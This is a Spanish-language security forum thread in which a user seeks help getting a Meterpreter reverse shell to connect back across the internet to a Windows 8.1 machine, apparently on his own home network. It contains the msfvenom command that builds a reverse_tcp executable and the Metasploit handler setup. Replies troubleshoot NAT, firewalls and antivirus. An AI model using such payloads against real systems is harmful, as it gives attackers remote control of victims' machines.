Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] No se inicia meterpreter ( Fuera de mi red local)

  • 8 Respuestas
  • 2295 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado Goaking

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: GoakingLs
« en: Agosto 12, 2018, 09:54:28 pm »
Antes de nada este es mi primer post, nunca e publicado ninguno antes, espero explicarme adecuadamente.Tengo un problema/duda estoy intentando lanzar un ataque fuera de mi red local a un windows 8.1 que esta conectado a un router que tengo en mi casa ( en mi casa tengo 2 routers ) pero cuando ejecuto todos los comandos y ejecuto a su vez el archivo . exe  en el windows 8.1 no se me inica meterpreter> aqui os dejo con los comandos que utilizo y el payload

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe  LHOST=ip pública LPORT=4444-o /root/Escritorio/PruebaFueraLan.exe
Anteriormente ya e abierto el puerto
nueva terminal y ejecuto metasploit
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > set LHOST mi ip
LHOST => 0.0.0.0
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on mi ip :4444


ejecuto el exe ya enviado al windows 8.1 pero no se me inicia el meterpreter
Si alguien me puede ayudar se lo agradeceria mucho  :) :) :)


« Última modificación: Septiembre 30, 2018, 11:03:24 am por xyz »
El conocimiento es libre

Desconectado davidhs

  • *
  • Underc0der
  • Mensajes: 60
  • Actividad:
    1.67%
  • Reputación 2
  • La oscuridad de mi teclado me lleva a la eternidad
    • Ver Perfil
    • Hardsoft Security
« Respuesta #1 en: Agosto 13, 2018, 03:47:23 am »
Hola Goaking, en principio si ya has hecho nat en tu router para redirigir las peticiones entrantes, es decir que has abierto el puerto 4444 a la máquina atacante x.y.z.v, ya tendrías un paso realizado, después también en el parámetro de escucha LHOST me imagino como describes habrás puesto la ip de tú máquina atacante, si la configuración de metasploit la tienes configurada correctamente, creo que la clave la tendrás en el nat de tu router o en en la máquina donde estés ejecutando mestasploit, ya que puede ser que el firewall no tenga permitido aceptar esas peticiones(esto es menos probable, pero posible).
Un mundo construido sobre fantasía. Emociones sintéticas en forma de pastillas. Guerras psicológicas en forma de publicidad. Sustancias químicas que alteran la mente en forma de comida. Lavados de cerebro en forma de medios de comunicación. Agujas aisladas bajo control en forma de redes sociales.

Desconectado Goaking

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: GoakingLs
« Respuesta #2 en: Agosto 23, 2018, 08:32:08 am »
Hola amigo antes de nada gracias por ayudarme, ya configure el nat pero sigue igual, lo probé con ngrok y funciona perfectamente, si sabes de algún otro método o alguna solución me ayudarlas bastante,gracias
El conocimiento es libre

Desconectado puntoCL

  • *
  • Moderador Global
  • Mensajes: 279
  • Actividad:
    0%
  • Reputación 6
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #3 en: Agosto 23, 2018, 11:18:17 am »
Hola @Goaking

Super facil liberar el puerto del router.

Saludos.




Desconectado Goaking

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: GoakingLs
« Respuesta #4 en: Agosto 23, 2018, 02:13:05 pm »
Antes de nada gracias por aportar @puntoCL
A que te refieres con liberar los puertos?
Si te refieres a abrirlos si ya están abiertos los puertos y aún sigo sin poder
El conocimiento es libre

Desconectado puntoCL

  • *
  • Moderador Global
  • Mensajes: 279
  • Actividad:
    0%
  • Reputación 6
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #5 en: Agosto 23, 2018, 02:55:04 pm »
y que ip pusiste en el router? y te fijaste que ese puerto esta libre? por que puedes a ver un servicio que esta corriendo en ese puerto




Desconectado Goaking

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: GoakingLs
« Respuesta #6 en: Agosto 23, 2018, 05:00:19 pm »
@puntoCL puse la ip privada que ya puse en su día en estática y el puerto esta libre e llegado a pensar que fuera por la compañía que tengo contratada pero lo intenté en otra red WiFi y sigue pasando lo mismo, me cuesta decirlo pero creo que me voy a rendir porque ya no se porque puede ser de todas formas muchas gracias de todas formas  dejaré el post abierto
El conocimiento es libre

Desconectado puntoCL

  • *
  • Moderador Global
  • Mensajes: 279
  • Actividad:
    0%
  • Reputación 6
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #7 en: Agosto 23, 2018, 05:19:11 pm »
puede ser que la maquina victima no ejecute el paylodad. el AV puede borrar o por ultima instancia ve el corta fuego




Desconectado Goaking

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: GoakingLs
« Respuesta #8 en: Agosto 23, 2018, 10:55:26 pm »
@puntoCL Amigo gracias por tu ayuda pero creo que es mejor que deje este tema apartado.No quiero comerme mas la cabeza porque llevo mucho tiempo investigando y no encuentro la solución, lo que hare sera centrarme en otra cosa y  aprender otros ataques o otras cosas  como SQL injection que tengo ganas de aprender mas sobre el tema.
La verdad no me esperaba que me ayudarais porque como nunca puse ningun post no tenia mucha confianza pero ya se que este es un buen foro :) , lo bueno de todo esto esque he aprendido mucho mas sobre el tema gracias a ustedes de verdad gracias por la ayuda, si consigo algún dia conseguir hacer el ataque fuera de lan intentare ayudar a personas con el mismo problema
GRACIAS!!! ;)
El conocimiento es libre

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 22511
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 9661
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 8266
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 12829
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Ayuda urgente con Virus "Virus.Win32Sality"

Iniciado por Napsters

Respuestas: 6
Vistas: 10848
Último mensaje Junio 11, 2012, 03:38:18 am
por Satyricon